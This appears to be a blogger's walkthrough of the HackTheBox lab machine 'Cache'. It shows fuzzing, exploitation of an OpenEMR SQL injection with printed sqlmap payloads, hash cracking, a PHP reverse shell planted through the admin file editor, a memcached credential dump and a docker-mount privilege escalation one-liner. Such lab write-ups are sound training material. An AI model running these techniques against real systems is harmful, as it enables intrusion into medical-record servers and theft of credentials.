HackTheBox Cache Writeup – 10.10.10.188

Hello,welcome back and here is my new article on the part of HackTheBox Writeup Series of new Linux box Cache – 10.10.10.188 by ASHacker. A medium difficulty machine that requires a good amount of enumeration for the foothold and a bit of guessing or fuzzing.

Difficulty: Medium

Points: 30

Machine Maker: ASHacker

NMAP Scanning

As always, add the machine IP 10.10.10.188 to etc\hosts and proceed to namp scanning.

$ nmap -sC -sV -p- cache.htb                     
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-10 13:17 +03
Nmap scan report for cache.htb (10.10.10.188)
Host is up (0.14s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1175.60 seconds

# root @ ns09 in ~/htb/cache [13:37:17] 

We found port SSH port 22 and HTTP port 80 open. On visiting the webserver we noticed the following website is hosted.

HackTheBox Cache Writeup – 10.10.10.188

Accessing the Login Page

There is a login page, I tried to log in using common passwords, but failed with error message “Password didn’t Match”.

I went on enum the backend, well there is nothing much, however I noticed the error message “Password didn’t Match”, don’t seem to be coming from this page, or I couldn’t see where the login action is going to hit. Also, the page looked like an iFrame page. Well, there is something inside the back-end of the back-end.

Let us see how the source-code of login.html page looks like:

I noticed the password field calling value “FakePSW” which nowhere mentioned, and there is a jQuery “functionality.js” calling as well. So I proceed to check it and well, here we have the credentials that we are looking for.

Credentials

ash:H@v3_fun

We managed to log in using the credentials we just found, but the page is an under construction page, with an image. A reverse lookup says the image is Portgas D Ace of One Piece series. Our instinct says, this picture has something to do with the further levels.

Finding New Domain By Guessing 😉

I stuck at this point for a while and realized this could be a rabbit hole, so started to enumerate the website. The Author’s page has his profile and short description of his projects. I noticed that the author is working on two projects, Cache and HMS(Hospital Management System).

Author’s first project is cache.htb and another project could be hms.htb? I immediately update my hosts file with hms.htb and access the page and to my surprise, I have the “OpenEmr” login page in front of me.

Note: I honestly accept that I didn’t use WFUZZ like most users did, in my case it was just a mere guessing work.

Finding New Domain By Intended Way

But I wasn’t convinced, I saw a lot of people found the second domain name by intended way, so I wanted use that method as well, I asked for a nudge from a Discord friend, he suggested me to use CeWL to gather custom wordlist from the website cache.htb and use the WFUZZ HOST Fuzzing.

# root @ ns09 in ~/htb/cache
$ cewl -w list http://cache.htb/                                                  

FUZZING:

# root @ ns09 in ~/htb/cache [19:53:33] 
$ wfuzz -w list -H 'Host: FUZZ.htb' -u http://10.10.10.188/ --hc 400,200 --hh 1234
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************
Target: http://10.10.10.188/
Total requests: 609
===================================================================
ID           Response   Lines    Word     Chars       Payload                                                               
===================================================================
000000606:   302        0 L      0 W      0 Ch        "HMS"                                                                 
Total time: 10.07316
Processed Requests: 609
Filtered Requests: 608
Requests/sec.: 60.45767

So here it is: HMS.HTB

Exploiting OpenEMR – Electronic Medical Record and Practice Management Software

As I was able to find the new domain and the application running, the next step is to find vulnerability and exploit it. The exploit on ExploitDB I found was not that helpful, so I thought of trying the other PoC on YouTube.

Patient Portal Access Page

Confirming the error based SQLi is possible.

Using BurpSuite

I captured the process of “portal/add_edit_event_user.php?eid=1′” and copy the request in to a file called request.

GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=br7hdmh5qrk3k88pmid56tjnir; OpenEMR=78s755ehenddjrqa8pev8dbvi4
Connection: close
Upgrade-Insecure-Requests: 1

SQLMAP

Once I have the file request is ready I opened my terminal and set the sqlmap for the task and get the database name.

# root @ ns09 in ~/htb/cache [13:27:59] 
$ sqlmap -r request --dbs --threads=10
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:28:08 /2020-05-10/

[13:28:08] [INFO] parsing HTTP request from 'request'
[13:28:08] [INFO] testing connection to the target URL
[13:28:09] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[13:28:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[13:28:10] [INFO] testing if the target URL content is stable
[13:28:13] [INFO] target URL content is stable
[13:28:13] [INFO] testing if GET parameter 'eid' is dynamic
[13:28:15] [WARNING] GET parameter 'eid' does not appear to be dynamic
-----snip---------
[13:28:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[13:28:56] [INFO] GET parameter 'eid' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --not-string="row")
[13:28:56] [INFO] testing 'Generic inline queries'
[13:28:58] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[13:29:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[13:29:02] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[13:29:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[13:29:05] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
-----snip----------
[13:29:13] [INFO] GET parameter 'eid' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable 
[13:29:13] [INFO] testing 'MySQL inline queries'
[13:29:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[13:29:14] [WARNING] time-based comparison requires larger statistical model, please wait... (done)                                                                       
[13:29:18] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[13:29:19] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[13:33:32] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
---------snip------------
[13:34:14] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
GET parameter 'eid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 330 HTTP(s) requests:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: eid=(SELECT (CASE WHEN (4761=4761) THEN 1 ELSE (SELECT 2592 UNION SELECT 7410) END))

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: eid=1 AND EXTRACTVALUE(7392,CONCAT(0x5c,0x716a6a7671,(SELECT (ELT(7392=7392,1))),0x716a717671))
---
[13:35:27] [INFO] the back-end DBMS is MySQL
[13:35:27] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[13:35:27] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[13:35:29] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.1
[13:35:29] [INFO] fetching database names
[13:35:29] [INFO] starting 2 threads
[13:35:30] [INFO] retrieved: 'information_schema'
[13:35:30] [INFO] retrieved: 'openemr'
available databases [2]:
[*] information_schema
[*] openemr

[13:35:30] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 40 times
[13:35:30] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hms.htb'

I found the database name as “openemr” it’s time to gather table and user names. The SQLMAP returned with around 234 tables, what I’m interested in is User tables.

So, I decided to dump the user tables one by one until I get the right one. The table users_secure has the right user in it and I have the salted credentials for the user openemr_admin

[20:43:42] [INFO] retrieved: '$2a$05$l2sTLIG6GTBeyBf7TAKL6A$'
[20:43:42] [INFO] retrieved: ' '
[20:43:42] [INFO] retrieved: ' '
[20:43:42] [INFO] retrieved: 'openemr_admin'
Database: openemr
Table: users_secure
[1 entry]
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| id   | salt                           | username      | password                                                     | last_update         | salt_history1 | salt_history2 | password_history1 | password_history2 |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| 1    | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL          | NULL          | NULL              | NULL              |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+

Cracking The Hash using John

I copied the hash $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. in to a file and used john to crack. John took a couple of seconds to crack the hash as the password is xxxxxx.

# root @ ns09 in ~/htb/cache [13:46:30] 
$ john hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx           (?)
1g 0:00:00:01 DONE (2020-05-10 13:46) 0.7042g/s 595.7p/s 595.7c/s 595.7C/s tristan..princesita
Use the "--show" option to display all of the cracked passwords reliably
Session completed
# root @ ns09 in ~/htb/cache [13:46:43] 

Logging In to the OpenEMR System

The OpenEMR system administrator has an option to edit files under “Administration” menu. Whatever I amend the default file will update the statement.inc.php file.

PHP Reverse Shell

I coped the good-old php reverse shell script from GitHub and update the required fields and saved it on top of the statement.inc.php.

File Location:

I host my listener listening the port 9999 and Once everything is set up, I execute the file by just visiting the link: hms.htb/sites/default/statement.inc.php. There, my listener is activated and I have reverse shell as www-data.

After getting the shell, I proceed to get user first, there are two users in the box Ash and Luffy, I wasn’t able to access Luffy, but Ash. Ash got user.txt in his directory, however, www-data cannot read it.

By further enumeration I got to know that Memcached is running. As I have done a few machines recently on HTB using Memcached exploits, I immediately jump to work on it.

As per status, Memcached is running on the port 11211. I can now easily connect to the service and dump data. First I made sure to connect the server on the port 11211 using telnet and dump all the items

$ telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
stats items
STAT items:1:number 5
STAT items:1:number_hot 0
STAT items:1:number_warm 0
STAT items:1:number_cold 5
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 20
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 44
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 350
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 0
STAT items:1:hits_to_temp 0
END

From the STATs I noticed only a few numbers of cached item are having data. And I read the cache:

stats cachedump 1 100
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END

User:

Password:

SSH Using Luffy’s Credentials

I now have the user Luffy’s credentials. I will try to SSH the box and see if it works.

Once Logged-in I tried grab user.txt from Ash’s directory, but still permission denied. 🙁

Docker To Root

A a couple of days ago I owned a machine on the TryHackme using the similar approach. Also, previous couple of machines in HTB as well-made similar to this. There is a nice article that shows how it works. First I should make sure that the docker images are Ubuntu.

If you want to understand how it works read the following articles:

Getting User and Root Together

I run “docker run -v /:/mnt –rm -it ubuntu chroot /mnt bash” and I’m root. The funny part was, though I got root, my flags were not accepted, I had an error saying “Incorrect hash for Cache”, but I reset the box and got the working flag immediately.

That’s all for today, thanks for your visit and reading guys.


Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
4 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
cosmic
5 months ago

DailyBugle on THM did not use a Docker privesc

Willy
Willy
4 months ago

Hello there
 
From luffy you can go to ash through the credentials obtained before
 

luffy@cache:~$ su - ash
Password: H@v3_fun
ash@cache:~$ whoami
ash
ash@cache:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash) 

 
The point is , as you can see, ash isn´t in docker group. So it´s needed return to luffy for the privilege escalation. Anyway, I like your way, because it´s two in a row =p hehehe
 
Greetings!
 

Last edited 4 months ago by Willy
Sorry, that action is blocked.